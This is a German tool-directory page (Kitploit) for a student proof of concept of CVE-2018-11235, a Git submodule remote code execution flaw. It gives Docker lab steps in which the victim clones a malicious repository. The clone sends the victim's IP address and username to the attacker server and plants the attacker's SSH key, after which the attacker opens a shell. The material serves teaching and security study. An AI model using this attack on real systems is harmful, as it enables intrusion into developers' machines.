Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2018-11235 — Proof of Concept - RCE-Ausnutzung : Schwachstelle in den Namen von Git-Submodulen - Ensimag November 2018 | Kitploit
Tools/GitHubGitHub/ygouzerh/cve-2018-11235
SchwachstellenanalyseExploitationPenetrationstestsLernen & BildungRemote-Access-ToolLabs & Praxis
GitHubygouzerh/cve-2018-11235

CVE-2018-11235

Proof of Concept - RCE-Ausnutzung : Schwachstelle in den Namen von Git-Submodulen - Ensimag November 2018

Repository anzeigen
1vor 7 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Webseite

CVE-2018-11235

Erste Schritte

Um die Docker-Container zu bauen, verwenden Sie:

root@kitploit:~
make docker

(Die folgenden make-Befehle sollten parallel auf verschiedenen Terminals auf Ihrer Maschine ausgeführt werden)

Um den Container des Angreiferservers zu starten, verwenden Sie:

root@kitploit:~
make run_server

Um den Container, der das Opfer darstellt, zu starten, verwenden Sie:

root@kitploit:~
make run_client

Der Container wird das Skript client.py ausführen. Das Skript wird seine IP-Adresse und seinen Benutzernamen an den Angreifer übermitteln.

Befolgen Sie die Anweisungen der Client-Konsole, um das bösartige Git-Repository zu klonen.

root@kitploit:~
git clone --recurse-submodules root@server:home/poc/malicious_repo client_pwned

Sie werden feststellen, dass die IP-Adresse und der Benutzername des Opfers an den Server übermittelt werden.

Nach dem Klonen überprüfen Sie, ob der öffentliche Schlüssel der Angreifer zu den authorized_keys des Clients hinzugefügt wurde.

Anschließend können Sie eine Shell auf dem Client vom Server aus öffnen, mit dem folgenden Befehl (auf Ihrer Maschine auszuführen):

root@kitploit:~
make server_bash

ssh <transmitted_username>@<transmitted_host>

Fragen

Wenn Sie Probleme bei der Ausführung dieses Proof of Concept haben, erstellen Sie bitte ein Issue in diesem Repository: https://github.com/ygouzerh/CVE-2018-11235/issues , wir werden Ihnen so schnell wie möglich antworten.

Tool herunterladen